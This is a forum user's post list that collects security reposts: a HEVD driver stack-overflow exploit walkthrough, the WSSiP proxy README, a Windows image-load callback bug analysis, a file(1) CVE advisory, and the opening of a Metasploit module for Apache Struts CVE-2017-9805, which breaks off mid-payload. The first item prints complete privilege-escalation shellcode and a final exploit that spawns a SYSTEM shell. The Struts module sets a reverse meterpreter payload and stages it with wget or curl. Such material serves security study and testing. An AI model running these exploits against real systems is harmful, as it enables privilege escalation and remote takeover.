Everything posted by Nytro

  1. HEVD Stack Overflow GS

     Posted on September 5, 2017

     Lately, I've decided to play around with HackSys Extreme Vulnerable Driver (HEVD) for fun. It's a great way to familiarize yourself with Windows exploitation. In this blog post, I'll show how to exploit the stack overflow that is protected with /GS stack cookies on Windows 7 SP1 32-bit. You can find the source code here. It has a few more exploits written and a Win10 pre-anniversary version of the regular stack buffer overflow vulnerability.

     Triggering the Vulnerable Function

     To start, we need to find the ioctl dispatch routine in HEVD. Looking for the IRP_MJ_DEVICE_CONTROL IRP, we see that the dispatch function can be found at hevd+508e.

     kd> !drvobj hevd 2
     Driver object (852b77f0) is for:
      \Driver\HEVD
     DriverEntry:   995cb129  HEVD
     DriverStartIo: 00000000
     DriverUnload:  995ca016  HEVD
     AddDevice:     00000000

     Dispatch routines:
     [00] IRP_MJ_CREATE                    995c9ff2  HEVD+0x4ff2
     [01] IRP_MJ_CREATE_NAMED_PIPE         995ca064  HEVD+0x5064
     ...
     [0e] IRP_MJ_DEVICE_CONTROL            995ca08e  HEVD+0x508e
     [0f] IRP_MJ_INTERNAL_DEVICE_CONTROL   995ca064  HEVD+0x5064
     [10] IRP_MJ_SHUTDOWN                  995ca064  HEVD+0x5064
     [11] IRP_MJ_LOCK_CONTROL              995ca064  HEVD+0x5064
     [12] IRP_MJ_CLEANUP                   995ca064  HEVD+0x5064
     [13] IRP_MJ_CREATE_MAILSLOT           995ca064  HEVD+0x5064
     [14] IRP_MJ_QUERY_SECURITY            995ca064  HEVD+0x5064
     [15] IRP_MJ_SET_SECURITY              995ca064  HEVD+0x5064
     ...

     Finding the ioctl request number requires very light reverse engineering. We eventually want to end up at hevd+515a. At hevd+50b4, 222003h is subtracted from the request number. If it was 222003h, the code jumps to hevd+5172; otherwise it falls through to hevd+50bf. In this basic block, 4 is subtracted from the result. If that yields 0, we are where we want to be. Therefore, our ioctl number should be 222007h. Eventually, a memcpy is reached where the calling function does not check the copy size. To give the overflow code a quick run, we call it with benign input using the code below.
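A quick aside before the PoC: the IOCTL number derived above can be sanity-checked by unpacking it with the documented CTL_CODE bit layout. This is a minimal Python 3 sketch; the constant names in the comments follow the Windows SDK and are not part of the original writeup.

```python
# CTL_CODE layout: (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
IOCTL = 0x222007

device_type = (IOCTL >> 16) & 0xFFFF  # 0x22  = FILE_DEVICE_UNKNOWN
access      = (IOCTL >> 14) & 0x3     # 0     = FILE_ANY_ACCESS
function    = (IOCTL >> 2) & 0xFFF    # 0x801 = driver-defined function code
method      = IOCTL & 0x3             # 3     = METHOD_NEITHER

print(hex(device_type), hex(function), method)  # 0x22 0x801 3
```

Reassembling the fields gives back 0x222007, which matches the value recovered by stepping through the dispatch routine.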
     You can find the implementation of mmap and write in the full source code.

     def trigger_stackoverflow_gs(addr, size):
         dwReturn = c_ulong()
         driver_handle = kernel32.CreateFileW(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None)
         if not driver_handle or driver_handle == -1:
             sys.exit()
         print "[+] IOCTL: 0x222007"
         dev_ioctl = kernel32.DeviceIoControl(driver_handle, 0x222007, addr, size, None, 0, byref(dwReturn), None)

     m = mmap()
     write(m, 'A'*10)
     trigger_stackoverflow_gs(m, 10)

     In WinDbg, the debug output confirms that we are calling the right ioctl. From the figure, we can see that the kernel buffer is 0x200 bytes in size, so if we run the PoC again with 0x250 As, we should overwrite the stack cookie and blue-screen our VM. Indeed, the bugcheck tells us that the system crashed due to a stack buffer overflow. Stack cookies in Windows are XORed with ebp before they're stored on the stack. If we take the cookie from the bugcheck and XOR it with 41414141, the result should resemble a stack address. Specifically, it should be the stack base pointer for hevd+48da.

     kd> ? e9d25b91 ^ 41414141
     Evaluate expression: -1466754352 = a8931ad0

     Bypassing Stack Cookies

     A common way to bypass stack cookies, introduced by David Litchfield, is to cause the program to throw an exception before the stack cookie is checked at the end of the function. This works because when an exception occurs, the stack cookie is not checked.

     There are two ways [generating an exception] might happen--one we can control and the other is dependent on the code of the vulnerable function. In the latter case, if we overflow other data, for example parameters that were pushed onto the stack to the vulnerable function, and these are referenced before the cookie check is performed, then we could cause an exception by setting this data to something that will cause an exception.
     If the code of the vulnerable function has been written in such a way that no opportunity exists to do this, then we have to attempt to generate our own exception. We can do this by attempting to write beyond the end of the stack.

     For us, it's easy because the vulnerable function uses memcpy. We can simply force memcpy to segfault by letting it continue copying the source buffer all the way into unmapped memory. I use my mmap function to map two adjacent pages, then munmap to unmap the second page. mmap and munmap are just simple wrappers I wrote for NtAllocateVirtualMemory and NtFreeVirtualMemory respectively. The idea is to place the source buffer at the end of the first (mapped) page and have the vulnerable memcpy read off into the unmapped page to cause an exception. To test this, we'll use the PoC code below.

     m = mmap(size=0x2000)
     munmap(m+0x1000)
     trigger_stackoverflow_gs(m+0x1000-0x250, 0x251)

     Back in the debugger, we can observe that an exception was thrown and eip was overwritten as a result of the exception handler being overwritten. The next step is to find the offset into the As at which we control eip, so we can point it at shellcode. You could binary-search for the offset, but an easier method is to use a De Bruijn sequence as the payload. I usually use Metasploit's pattern_create.rb and pattern_offset.rb for finding the exact offset in my buffer. The figure above shows that 41367241 overwrites the exception handler address and hence eip.

     kd> .formats 41367241
     Evaluate expression:
       Hex:     41367241
       Decimal: 1094087233
       Octal:   10115471101
       Binary:  01000001 00110110 01110010 01000001
       Chars:   A6rA
       Time:    Wed Sep 1 18:07:13 2004
       Float:   low 11.4029 high 0
       Double:  5.40551e-315

     Reversing the order due to endianness, we get Ar6A, which pattern_offset.rb tells us is at offset 528 (0x210). Therefore, our source buffer will be of size 0x210+4, where the extra 4 bytes hold the address of our shellcode.
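The pattern trick above can be reproduced in a few lines of Python 3. This is a simplified re-implementation of the upper/lower/digit triplet scheme used by Metasploit's pattern_create.rb (not the tool itself), and it also shows why the dword 0x41367241 reads back as Ar6A on a little-endian machine.

```python
import struct

def pattern_create(length):
    # Non-repeating triplets: uppercase, lowercase, digit (Aa0Aa1...Zz9)
    out = []
    for u in "ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for l in "abcdefghijklmnopqrstuvwxyz":
            for d in "0123456789":
                out.append(u + l + d)
    return "".join(out)[:length]

pat = pattern_create(0x1000)

# On little-endian x86, the dword 0x41367241 sits in memory as 'A' 'r' '6' 'A'.
needle = struct.pack("<I", 0x41367241).decode()  # 'Ar6A'
offset = pat.find(needle)
print(needle, offset)  # Ar6A 528
```

Because every 4-byte window of the pattern is unique, the dword pulled out of the crashed register pins down the exact offset, 528 (0x210), in one run.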
     Constructing Shellcode

     Since there are 0x1000-0x210-4 bytes of unused space in our allocated page, we can just put our shellcode at the beginning of the page. I use common Windows token-stealing shellcode that iterates through the _EPROCESS list, looks for the SYSTEM process, and copies the SYSTEM process' token. Additionally, for convenience in breaking at the shellcode, I prepend it with a breakpoint (\xcc).

     \xcc\x31\xc0\x64\x8b\x80\x24\x01\x00\x00\x8b\x40\x50\x89\xc1\x8b\x80\xb8\x00
     \x00\x00\x2d\xb8\x00\x00\x00\x83\xb8\xb4\x00\x00\x00\x04\x75\xec\x8b\x90\xf8
     \x00\x00\x00\x89\x91\xf8\x00\x00\x00

     Our shellcode isn't complete yet; it doesn't know where to return to after it executes. To find a return address, let's inspect the call stack in the debugger when the shellcode executes.

     kd> k
      # ChildEBP RetAddr
     WARNING: Frame IP not in any known module. Following frames may be wrong.
     00 a88cf114 82ab3622 0x1540000
     01 a88cf138 82ab35f4 nt!ExecuteHandler2+0x26
     02 a88cf15c 82ae73b5 nt!ExecuteHandler+0x24
     03 a88cf1f0 82af005c nt!RtlDispatchException+0xb6
     04 a88cf77c 82a79dd6 nt!KiDispatchException+0x17c
     05 a88cf7e4 82a79d8a nt!CommonDispatchException+0x4a
     06 a88cf868 995c9969 nt!KiExceptionExit+0x192
     07 a88cf86c a88cf8b4 HEVD+0x4969
     08 a88cf870 01540dec 0xa88cf8b4
     09 a88cf8b4 41414141 0x1540dec
     0a a88cf8b8 41414141 0x41414141
     0b a88cf8bc 41414141 0x41414141
     ...
     51 a88cfad0 995c99ca 0x41414141
     52 a88cfae0 995ca16d HEVD+0x49ca
     53 a88cfafc 82a72593 HEVD+0x516d
     54 a88cfb14 82c6699f nt!IofCallDriver+0x63

     hevd+4969 is the instruction address after the memcpy, but we can't return there because the portion of the stack the remaining code uses is corrupted, and fixing the stack to the correct values would be extremely annoying. Instead, it makes more sense to return to hevd+49ca, which is the return address of the stack frame right below hevd+4969. However, if you adjust the stack and return to hevd+49ca, you'll still get a crash.
     The problem is at hevd+5260, where edi+0x1c is dereferenced. edi at this point is 0, because registers are XORed with themselves before the exception handler assumes control, and neither the program nor our shellcode touched edi. In a normal execution, edi and the other registers are restored in __SEH_epilog4, and these values are of course restored from the stack. Taking a88cf86c from the stack trace before, we can dump memory and attempt to find the restore values. They're actually quite easy to find here because hevd+5dcc is easy to spot: it is the address of the debug print string, which is restored into ebx.

     kd> dds a88cf86c
     a88cf86c  995c9969 HEVD+0x4969
     a88cf870  a88cf8b4
     a88cf874  01540dec
     a88cf878  00000218
     a88cf87c  995ca760 HEVD+0x5760
     a88cf880  995ca31a HEVD+0x531a
     a88cf884  00000200
     a88cf888  995ca338 HEVD+0x5338
     a88cf88c  a88cf8b4
     a88cf890  995ca3a2 HEVD+0x53a2
     a88cf894  00000218
     a88cf898  995ca3be HEVD+0x53be
     a88cf89c  01540dec
     a88cf8a0  31d15d0b
     a88cf8a4  8c843f68  <-- edi
     a88cf8a8  8c843fd8  <-- esi
     a88cf8ac  995cadcc HEVD+0x5dcc  <-- ebx
     a88cf8b0  455f5359
     a88cf8b4  41414141
     a88cf8b8  41414141

     To obtain the offset of edi, just subtract esp from the address of the restore value.

     kd> ? a88cf8a4 - esp
     Evaluate expression: 1932 = 0000078c

     kd> dds a88cfad0 la
     a88cfad0  a88cfae0
     a88cfad4  995c99ca HEVD+0x49ca
     a88cfad8  01540dec
     a88cfadc  00000218
     a88cfae0  a88cfafc
     a88cfae4  995ca16d HEVD+0x516d
     a88cfae8  8c843f68
     a88cfaec  8c843fd8
     a88cfaf0  86c3c398
     a88cfaf4  8586f5f0

     kd> ? a88cfad0 - esp
     Evaluate expression: 2488 = 000009b8

     Similarly, the offset to return to is found by taking the difference of a88cfad0 and esp.
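The two offsets computed above can be cross-checked with trivial arithmetic: both WinDbg expressions must imply the same value of esp at the time the shellcode runs. A small Python 3 sketch using the addresses from the dumps above:

```python
# Addresses and offsets taken from the kd> output above.
edi_slot   = 0xa88cf8a4  # stack slot holding the saved edi
ret_slot   = 0xa88cfad0  # stack slot just before the hevd+49ca return address
edi_offset = 0x78c       # kd> ? a88cf8a4 - esp
ret_offset = 0x9b8       # kd> ? a88cfad0 - esp

esp_from_edi = edi_slot - edi_offset
esp_from_ret = ret_slot - ret_offset

print(hex(esp_from_edi), hex(esp_from_ret))  # 0xa88cf118 0xa88cf118
assert esp_from_edi == esp_from_ret  # both expressions agree on esp
```

Both subtractions resolve to the same esp, which is exactly what lets the shellcode hardcode [esp+0x78c] for edi and add esp, 0x9b8 for the stack pivot.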
     Lastly, our shellcode should end with pop ebp; ret 8;, which results in:

     start:
       xor eax, eax;
       mov eax, dword ptr fs:[eax+0x124];  # nt!_KPCR.PcrbData.CurrentThread
       mov eax, dword ptr [eax+0x50];      # nt!_KTHREAD.ApcState.Process
       mov ecx, eax;                       # Store unprivileged _EPROCESS in ecx
     loop:
       mov eax, dword ptr [eax+0xb8];      # Next nt!_EPROCESS.ActiveProcessLinks.Flink
       sub eax, 0xb8;                      # Back to the beginning of _EPROCESS
       cmp dword ptr [eax+0xb4], 0x04;     # SYSTEM process? nt!_EPROCESS.UniqueProcessId
       jne loop;
     stealtoken:
       mov edx, dword ptr [eax+0xf8];      # Get SYSTEM nt!_EPROCESS.Token
       mov dword ptr [ecx+0xf8], edx;      # Copy token
     restore:
       mov edi, [esp+0x78c];               # edi
       mov esi, [esp+0x790];               # esi
       mov ebx, [esp+0x794];               # move print string into ebx
       add esp, 0x9b8;
       pop ebp;
       ret 0x8;

     Gaining NT Authority\SYSTEM

     Putting everything together, the final exploit looks like this.

     m = mmap(size=0x2000)
     munmap(m+0x1000)
     size = 0x210+4
     sc = '\x31\xc0\x64\x8b\x80\x24\x01\x00\x00\x8b\x40\x50\x89\xc1\x8b\x80\xb8\x00\x00\x00\x2d\xb8\x00\x00\x00\x83\xb8\xb4\x00\x00\x00\x04\x75\xec\x8b\x90\xf8\x00\x00\x00\x89\x91\xf8\x00\x00\x00\x8b\xbc\x24\x8c\x07\x00\x00\x8b\xb4\x24\x90\x07\x00\x00\x8b\x9c\x24\x94\x07\x00\x00\x81\xc4\xb8\x09\x00\x00\x5d\xc2\x08\x00'
     write(m, sc + 'A'*(0x1000-4-len(sc)) + struct.pack("<I", m))
     trigger_stackoverflow_gs(m+0x1000-size, size+1)
     print '\n[+] Privilege Escalated\n'
     os.system('cmd.exe')

     And that should give us:

     Sursa: https://klue.github.io/blog/2017/09/hevd_stack_gs/
  2. WSSiP: A WebSocket Manipulation Proxy

     Short for "WebSocket/Socket.io Proxy", this tool, written in Node.js, provides a user interface to capture, intercept, send custom messages and view all WebSocket and Socket.IO communications between the client and server. Upstream proxy support also means you can forward HTTP/HTTPS traffic to an intercepting proxy of your choice (e.g. Burp Suite or Pappy Proxy) but view WebSocket traffic in WSSiP. More information can be found on the blog post.

     There is an outward bridge via HTTP to write a fuzzer in any language you choose to debug and fuzz for security vulnerabilities. See Fuzzing for more details.

     Written and maintained by Samantha Chalker (@thekettu). Icon for WSSiP release provided by @dragonfoxing.

     Installation

     From Packaged Application

     See Releases.

     From npm/yarn (for CLI commands)

     Run the following in your command line:

     npm:

     # Install Electron globally
     npm i -g electron@1.7
     # Install wssip globally for the "wssip" command
     npm i -g wssip
     # Launch!
     wssip

     yarn: (Make sure the directory in yarn global bin is in your PATH)

     yarn global add electron@1.7
     yarn global add wssip
     wssip

     You can also run npm install electron (or yarn add electron) inside the installed WSSiP directory if you do not want to install Electron globally, as the app packager requires Electron be added to developer dependencies.

     From Source

     Using a command line:

     # Clone repository locally
     git clone https://github.com/nccgroup/wssip
     # Change to the directory
     cd wssip
     # If you are developing for WSSiP:
     # npm i
     # If not... (to minimize disk space):
     npm i electron@1.7
     npm i --production
     # Start application:
     npm start

     Usage

     Open the WSSiP application. WSSiP will start listening automatically, defaulting to localhost on port 8080. Optionally, use Tools > Use Upstream Proxy to use another intercepting proxy to view web traffic. Configure the browser to point to http://localhost:8080/ as the HTTP proxy. Navigate to a page using WebSockets.
     A good example is the WS Echo Demonstration.

     Fuzzing

     WSSiP provides an HTTP bridge via the man-in-the-middle proxy for custom applications to help fuzz a connection. These endpoints are accessed over the proxy server.

     A few of the simple CA certificate downloads are:

     http://mitm/ca.pem / http://mitm/ca.der (Download CA Certificate)
     http://mitm/ca_pri.pem / http://mitm/ca_pri.der (Download Private Key)
     http://mitm/ca_pub.pem / http://mitm/ca_pub.der (Download Public Key)

     Get WebSocket Connection Info

     Returns whether the WebSocket id is connected to a web server, and if so, returns information.

     URL: GET http://mitm/ws/:id
     URL Params: id=[integer]

     Success Response (Not Connected):
       Code: 200
       Content: {connected: false}

     Success Response (Connected):
       Code: 200
       Content: {connected: true, url: 'ws://echo.websocket.org', bytesReceived: 0, extensions: {}, readyState: 3, protocol: '', protocolVersion: 13}

     Send WebSocket Data

     URL: POST http://mitm/ws/:id/:sender/:mode/:type?log=:log

     URL Params:
       Required:
         id=[integer]
         sender: one of client or server
         mode: one of message, ping or pong
         type: one of ascii or binary (text is an alias of ascii)
       Optional:
         log: either true or y to log in the WSSiP application. Errors will be logged in the WSSiP application instead of being returned via the REST API.

     Data Params: Raw data in the POST body will be sent to the WebSocket server.

     Success Response:
       Code: 200
       Content: {success: true}

     Error Response:
       Code: 500
       Content: {success: false, reason: 'Error message'}

     Development

     Pull requests are welcomed and encouraged. WSSiP supports the debug npm package, and setting the environment variable DEBUG=wssip:* will output debug information to the console. There are two commands depending on how you want to compile the Webpack bundle: for development, npm run compile:dev, and for production, npm run compile. React will also log errors depending on whether development or production is specified.
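The send endpoint above is easy to drive from any language. Below is a minimal Python 3 sketch of a fuzzer-side helper; the function name build_send_url and the use of the requests library are my own illustration, while the URL scheme is the one documented above.

```python
def build_send_url(ws_id, sender, mode, msg_type, log=False):
    """Compose the WSSiP bridge URL: POST http://mitm/ws/:id/:sender/:mode/:type?log=:log"""
    assert sender in ("client", "server")
    assert mode in ("message", "ping", "pong")
    assert msg_type in ("ascii", "binary", "text")  # text is an alias of ascii
    url = "http://mitm/ws/%d/%s/%s/%s" % (ws_id, sender, mode, msg_type)
    if log:
        url += "?log=true"
    return url

# Example: inject a text frame toward the server on connection 0.
# Requires the client to actually be proxied through WSSiP, e.g.:
#   import requests
#   requests.post(build_send_url(0, "server", "message", "ascii"), data=b"fuzzed payload")
print(build_send_url(0, "server", "message", "ascii"))  # http://mitm/ws/0/server/message/ascii
```

The raw POST body is forwarded as the frame payload, so a fuzzer only needs to vary that body and the :mode/:type path segments.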
     Currently working on:

     - Exposed API for external scripts for fuzzing (99% complete; it is live but needs more testing with data)
     - Saving/resuming connections from file (35% complete; exporting works sans active connections)
     - Using WSSiP in a browser without Electron (likely 1.1.0)
     - Rewrite in TypeScript (likely 1.2.0)
     - Using something other than Appbar for the Custom/Intercept tabs, and styling the options to center better

     For information on using the mitmengine class, see: npm, yarn, or mitmengine/README.md

     Sursa: https://github.com/nccgroup/wssip
  3. Omri Misgav, September 5, 2017

     Windows' PsSetLoadImageNotifyRoutine Callbacks: the Good, the Bad and the Unclear (Part 1)

     tl;dr: Security vendors and kernel developers beware – a programming error in the Windows kernel could prevent you from identifying which modules have been loaded at runtime.

     Introduction

     During research into the Windows kernel, we came across an interesting issue with PsSetLoadImageNotifyRoutine, which, as its name implies, notifies of module loading. The thing is, after registering a notification routine for loaded PE images with the kernel, the callback may receive invalid image names. After digging into the matter, what started as a seemingly random issue proved to originate from a coding error in the Windows kernel itself. This flaw exists in the most recent Windows 10 release and in past versions of the OS, dating back to Windows 2000.

     The Good: Notification of Module Loading

     Say you are a security vendor developing a driver; you would like to be aware of every module the system loads. Hooking? Maybe... but there are many security and implementation deficiencies. This is where Microsoft's PsSetLoadImageNotifyRoutine, introduced in Windows 2000, comes in. This mechanism notifies registered drivers, from various parts of the kernel, when a PE image file has been loaded to virtual memory (kernel\user space).

     Behind the Scenes: There are several cases that will cause the notification routine to be invoked:

     - Loading drivers
     - Starting new processes
       - Process executable image
       - System DLL: ntdll.dll (2 different binaries for WoW64 processes)
     - Runtime loaded PE images – import table, LoadLibrary, LoadLibraryEx[1], NtMapViewOfSection[2]

     Figure 1: All calls to PsCallImageNotifyRoutines in ntoskrnl.exe

     When invoking the registered notification routines, the kernel provides them with a number of parameters in order to properly identify the PE image that is being loaded.
     These parameters can be seen in the prototype definition of the callback function:

     VOID (*PLOAD_IMAGE_NOTIFY_ROUTINE)(
         _In_opt_ PUNICODE_STRING FullImageName, // The image name
         _In_ HANDLE ProcessId,                  // A handle to the process the PE has been loaded to
         _In_ PIMAGE_INFO ImageInfo              // Information describing the loaded image (base address, size, kernel/user-mode image, etc.)
     );

     The Only Way to Go

     In essence, this is the only documented method in the WDK to actually monitor PEs that are loaded to memory as executable code. A different method, recommended by Microsoft, is to use a file-system mini-filter callback (IRP_MJ_ACQUIRE_FOR_SECTION_SYNCHRONIZATION). In order to tell that a section object is part of a loaded executable image, one must check for the existence of the SEC_IMAGE flag passed to NtCreateSection. However, the file-system mini-filter callback does not receive this flag, so it is impossible to determine whether the section object is being created for the loading of a PE image or not.

     The Bad: Wrong Module Parameter

     The only parameter that can effectively identify the loaded PE file is the FullImageName parameter. However, in each of the scenarios described earlier the kernel uses a different format for FullImageName. At first glance, we noticed that while we do get the full path of the process executable file and constant values for system DLLs (which are missing the volume name), for the rest of the dynamically loaded user-mode PEs the paths provided are missing the volume name. What's more alarming is that not only does the path come without the volume name, sometimes the path is completely malformed and could point to a different or non-existing file.

     RTFM

     So, as every researcher\developer does, the first thing we did was go back to the documentation and make sure we understood it properly. According to MSDN, the description of FullImageName implies it is the path of the file on disk, since it "identifies the executable image file".
     There is no mention of these invalid or non-existing paths. The documentation does state that it may be NULL: "(The FullImageName parameter can be NULL in cases in which the operating system is unable to obtain the full name of the image at process creation time.)". But clearly, if the parameter is not NULL, it means the kernel was able to successfully retrieve the correct image name.

     There's More than Just Typos in the Documentation

     Another thing that caught our attention while perusing the documentation was that the function prototype shown on MSDN is wrong. The Create parameter, which according to its description doesn't even seem to be related to this mechanism, doesn't exist in the function prototype from the WDK. Ironically, using the prototype specified on MSDN causes a crash due to stack corruption.

     Under the Hood

     nt!PsCallImageNotifyRoutines is in charge of invoking the registered callbacks. It merely passes along the UNICODE_STRING pointer it receives from its own caller to the callbacks as the FullImageName parameter. When nt!MiMapViewOfImageSection maps a section as an image, this UNICODE_STRING is the FileName field of the FILE_OBJECT represented by that section.

     Figure 2: FullImageName passed to the notification routine is actually the FILE_OBJECT's FileName field.

     The FILE_OBJECT is obtained by going through the SECTION -> SEGMENT -> CONTROL_AREA. These are internal and undocumented kernel structures. The Memory Manager creates these structures when mapping a file into memory, and uses them internally for as long as the file is mapped.

     Figure 3: nt!MiMapViewOfImageSection obtaining the FILE_OBJECT before calling nt!PsCallImageNotifyRoutines

     There's a single SEGMENT structure per mapped image. This means that multiple sections of the same image that exist simultaneously, within the same process or across processes, use the same SEGMENT and CONTROL_AREA.
     This explains why the FullImageName argument was identical when the same PE file was loaded into different processes at the same time.

     Figure 4: File mapping internal structures (simplified)

     RTFM Again

     In order to understand how the FileName field is set and managed, we went back to the documentation, and according to MSDN using it is forbidden! "[The value] in this string is valid only during the initial processing of an IRP_MJ_CREATE request. This file name should not be considered valid after the file system starts to process the IRP_MJ_CREATE request" – and at this point the FILE_OBJECT is clearly used after the file system completed the IRP_MJ_CREATE request. Now it's obvious that the NTFS driver takes ownership of this UNICODE_STRING (FILE_OBJECT.FileName). Using a kernel debugger, we found that ntfs!NtfsUpdateCcbsForLcbMove is the function responsible for the renaming operation. While looking at this function we inferred that during the IRP_MJ_CREATE request the file-system driver simply creates a shallow copy of FILE_OBJECT.FileName and maintains it separately. This means that only the address of the buffer is copied, not the buffer itself.

     Figure 5: ntfs!NtfsUpdateCcbsForLcbMove updating the file name value

     Root Cause Analysis

     As long as the new path length doesn't exceed MaximumLength, the shared buffer will be overwritten without updating the Length field of FILE_OBJECT.FileName, which is where the kernel gets the string for the notification routine. If the new path length exceeds MaximumLength, a new buffer will be allocated and the notification routine will get a completely outdated value. Even though we finally figured out the cause of this bug, something still didn't add up. Why is it that even after all the handles to the image (from SECTIONs and FILE_OBJECTs) were closed, we were still seeing these malformed paths?
     If all handles to the file were indeed closed, the next time the PE image is opened and loaded a new FILE_OBJECT should be created, with no references and with the most up-to-date path. Instead, FullImageName still pointed to the old UNICODE_STRING. This proved that the FILE_OBJECT wasn't closed even though its handle count was 0, which means the reference count must have been higher than 0. We were also able to confirm this using a debugger.

     Bottom Line

     As a refcount leak in the kernel isn't very likely, we are left with one immediate suspect: the Cache Manager. What seems to be caching behavior, along with the way the file-system driver maintains the file name and a severe coding error, is what ultimately causes the invalid name issue.

     Pausing to Reflect

     At this point we were sure we had figured out what causes the problem, though what eluded us was: how can it be that this bug still exists? And is there no obvious solution for it? In our next post, we'll cover our endeavors to find good answers to these questions.

     ————————————————–
     [1] Depending on the dwFlags parameter
     [2] Depending on the dwAllocationAttributes of NtCreateSection

     Note: the majority of the analysis was done on a Windows 7 SP1 x86 machine, fully patched and updated. The findings were also verified to be present on Windows XP SP3, Windows 7 SP1 x64, and Windows 10 Anniversary Update (Redstone), both x86 and x64, all fully patched and updated as well.

     Sursa: https://breakingmalware.com/documentation/windows-pssetloadimagenotifyroutine-callbacks-good-bad-unclear-part-1/
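To make the root cause concrete, here is a toy Python 3 model of the counted-string behavior described above. It is purely illustrative: CountedString is my own stand-in for UNICODE_STRING, and the paths are made up; the point is that an in-place rename which never updates Length yields exactly the kind of malformed, mixed-up path the callback receives.

```python
class CountedString:
    """Toy model of a counted string: a shared buffer plus Length/MaximumLength."""
    def __init__(self, text, maximum):
        self.buffer = list(text.ljust(maximum, "\0"))
        self.length = len(text)          # characters considered valid
        self.maximum_length = maximum    # allocated buffer size

    def view(self):
        # What a reader of (Buffer, Length) sees -- e.g. the image-load callback.
        return "".join(self.buffer[:self.length])

name = CountedString(r"\dir\original_long_name.dll", 64)

# Model of the rename path: the new name fits in MaximumLength, so the shared
# buffer is overwritten in place -- but Length is never updated.
new_name = r"\dir\new.dll"
name.buffer[:len(new_name)] = list(new_name)

print(name.view())  # \dir\new.dlll_long_name.dll -- new name fused with old tail
```

The stale Length makes the reader consume the new name plus leftover bytes of the old one, which is precisely a "completely malformed path that could point to a different or non-existing file".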
  4. CVE-2017-1000249: file: stack-based buffer overflow

     From: Thomas Jarosch <thomas.jarosch () intra2net com>
     Date: Tue, 05 Sep 2017 18:24:24 +0200

     Hello oss-security,

     file(1) versions 5.29, 5.30 and 5.31 contain a stack-based buffer overflow when parsing a specially crafted input file. The issue lets an attacker overwrite a fixed 20-byte stack buffer with a specially crafted .notes section in an ELF binary file. There are systems like amavisd-new that automatically run file(1) on every email attachment. To prevent an automated exploit by email, another layer of protection like -fstack-protector is needed.

     Upstream fix:
     https://github.com/file/file/commit/35c94dc6acc418f1ad7f6241a6680e5327495793

     The issue was introduced with this code change in October 2016:
     https://github.com/file/file/commit/9611f31313a93aa036389c5f3b15eea53510d4d1

     file-5.32 has been released including the fix:
     ftp://ftp.astron.com/pub/file/file-5.32.tar.gz
     ftp://ftp.astron.com/pub/file/file-5.32.tar.gz.asc

     [An official release announcement on the file mailing list will follow once a temporary outage of the mailing list is solved]

     The cppcheck tool helped to discover the issue:
     ----
     [readelf.c:514]: (warning) Logical disjunction always evaluates to true: descsz >= 4 || descsz <= 20.
     ----

     Credits: The issue was found by Thomas Jarosch of Intra2net AG. Code fix and new release provided by Christos Zoulas. Fixed packages from distributions should start to be available soon.

     Timeline (key entries):
     2017-08-26: Notified the maintainer Christos Zoulas
     2017-08-27: Christos pushed a fix to CVS/git with an innocent-looking commit message
     2017-08-28: Notified the Red Hat security team to coordinate the release and request a CVE ID. Red Hat responded that it's better to contact the distros list directly rather than go through them.
     2017-09-01: Notified the distros mailing list, asking for a CVE ID and requesting an embargo until 2017-09-08
     2017-09-01: CVE-2017-1000249 is assigned
     2017-09-04: After discussion that the issue is semi-public already, moved the embargo date to 2017-09-05
     2017-09-05: Public release

     Best regards,
     Thomas Jarosch / Intra2net AG

     Sursa: http://seclists.org/oss-sec/2017/q3/397
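The cppcheck warning quoted above is the heart of the bug: for any value of descsz, the disjunction `descsz >= 4 || descsz <= 20` is true, so the intended range check never rejects anything. A Python 3 sketch of the broken versus the intended predicate (the variable name follows the warning; this is an illustration of the logic, not the actual readelf.c code):

```python
def broken_check(descsz):
    # As flagged by cppcheck: a disjunction that always evaluates to true.
    # Any descsz < 4 satisfies the right side; any descsz >= 4 the left side.
    return descsz >= 4 or descsz <= 20

def fixed_check(descsz):
    # The intended bounds check: descsz must lie within [4, 20].
    return 4 <= descsz <= 20

# The broken check accepts every size -- including ones large enough to
# overflow the fixed 20-byte stack buffer.
for size in (0, 4, 20, 21, 0x1000):
    print(size, broken_check(size), fixed_check(size))
```

Swapping `or` for `and` (equivalently, the chained comparison above) restores the rejection of oversized .notes descriptors.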
  5. ##
     # This module requires Metasploit: https://metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

     class MetasploitModule < Msf::Exploit::Remote
       Rank = ExcellentRanking

       include Msf::Exploit::Remote::HttpClient
       include Msf::Exploit::CmdStager

       def initialize(info = {})
         super(update_info(info,
           'Name'           => 'Apache Struts 2 REST Plugin XStream RCE',
           'Description'    => %q{
             The REST Plugin is using a XStreamHandler with an instance of
             XStream for deserialization without any type filtering and this
             can lead to Remote Code Execution when deserializing XML payloads.
           },
           'Author'         => [
             'Man Yue Mo', # Vuln
             'caiqiiqi',   # PoC
             'wvu'         # Module
           ],
           'References'     => [
             ['CVE', '2017-9805'],
             ['URL', 'https://struts.apache.org/docs/s2-052.html'],
             ['URL', 'https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement'],
             ['URL', 'http://blog.csdn.net/caiqiiqi/article/details/77861477']
           ],
           'DisclosureDate' => 'Sep 5 2017',
           'License'        => MSF_LICENSE,
           'Platform'       => ['unix', 'linux', 'win'],
           'Arch'           => [ARCH_CMD, ARCH_X86, ARCH_X64],
           'Privileged'     => false,
           'Targets'        => [
             ['Apache Struts 2.5 - 2.5.12', {}]
           ],
           'DefaultTarget'  => 0,
           'DefaultOptions' => {
             'PAYLOAD'           => 'linux/x64/meterpreter_reverse_https',
             'CMDSTAGER::FLAVOR' => 'wget'
           },
           'CmdStagerFlavor' => ['wget', 'curl']
         ))

         register_options([
           Opt::RPORT(8080),
           OptString.new('TARGETURI', [true, 'Path to Struts app', '/struts2-rest-showcase/orders/3'])
         ])
       end

       def check
         res = send_request_cgi(
           'method' => 'GET',
           'uri'    => target_uri.path
         )

         if res && res.code == 200
           CheckCode::Detected
         else
           CheckCode::Safe
         end
       end

       def exploit
         execute_cmdstager
       end

       def execute_command(cmd, opts = {})
         send_request_cgi(
           'method' => 'POST',
           'uri'    => target_uri.path,
           'ctype'  => 'application/xml',
           'data'   => xml_payload(cmd)
         )
       end

       def xml_payload(cmd)
         # xmllint --format
         <<EOF
     <map>
       <entry>
         <jdk.nashorn.internal.objects.NativeString>
           <flags>0</flags>
           <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
             <dataHandler>
